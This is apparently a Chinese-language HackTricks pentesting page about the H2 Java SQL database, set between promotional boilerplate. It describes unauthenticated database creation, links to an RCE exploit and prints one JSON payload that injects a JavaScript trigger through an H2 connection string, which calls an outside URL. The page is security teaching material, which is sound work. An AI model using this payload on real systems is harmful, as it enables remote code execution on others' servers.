H2 - Java SQL数据库

从零开始学习AWS黑客技术，成为专家 htARTE（HackTricks AWS红队专家）！

支持HackTricks的其他方式：

如果您想看到您的公司在HackTricks中做广告或下载PDF格式的HackTricks，请查看订阅计划!
获取官方PEASS & HackTricks周边产品
探索PEASS家族，我们的独家NFTs
加入 💬 Discord群 或 电报群 或关注我们的Twitter 🐦 @carlospolopm。
通过向HackTricks和HackTricks Cloud github仓库提交PR来分享您的黑客技巧。

官方页面：https://www.h2database.com/html/main.html

访问

您可以指定一个不存在的数据库名称以便在没有有效凭据的情况下创建新数据库（未经身份验证）：

或者，如果您知道例如正在运行的mysql，并且知道该数据库的数据库名称和凭据，您可以直接访问它：

来自HTB的Hawk盒子的技巧。

RCE

在与H2数据库通信的权限下，检查此利用以获得RCE：https://gist.github.com/h4ckninja/22b8e2d2f4c29e94121718a43ba97eed

H2 SQL注入到RCE

在这篇文章中，解释了一个有效负载，通过SQL注入滥用H2数据库以获得RCE。

[...]
"details":
{
"db": "zip:/app/metabase.jar!/sample-database.db;MODE=MSSQLServer;TRACE_LEVEL_SYSTEM_OUT=1\\;CREATE TRIGGER IAMPWNED BEFORE SELECT ON INFORMATION_SCHEMA.TABLES AS $$//javascript\nnew java.net.URL('https://example.com/pwn134').openConnection().getContentLength()\n$$--=x\\;",
"advanced-options": false,
"ssl": true
},
[...]

从零开始学习AWS黑客技术，成为专家 htARTE（HackTricks AWS Red Team Expert）！

其他支持HackTricks的方式：

如果您想看到您的公司在HackTricks中做广告或下载PDF格式的HackTricks，请查看订阅计划!
获取官方PEASS & HackTricks周边产品
探索PEASS家族，我们的独家NFTs
加入 💬 Discord群 或 电报群 或关注我们的Twitter 🐦 @carlospolopm。
通过向HackTricks和HackTricks Cloud github仓库提交PR来分享您的黑客技巧。

3.4 KiB Raw Blame History Unescape Escape

H2 - Java SQL数据库

访问

RCE

H2 SQL注入到RCE

3.4 KiB

Raw Blame History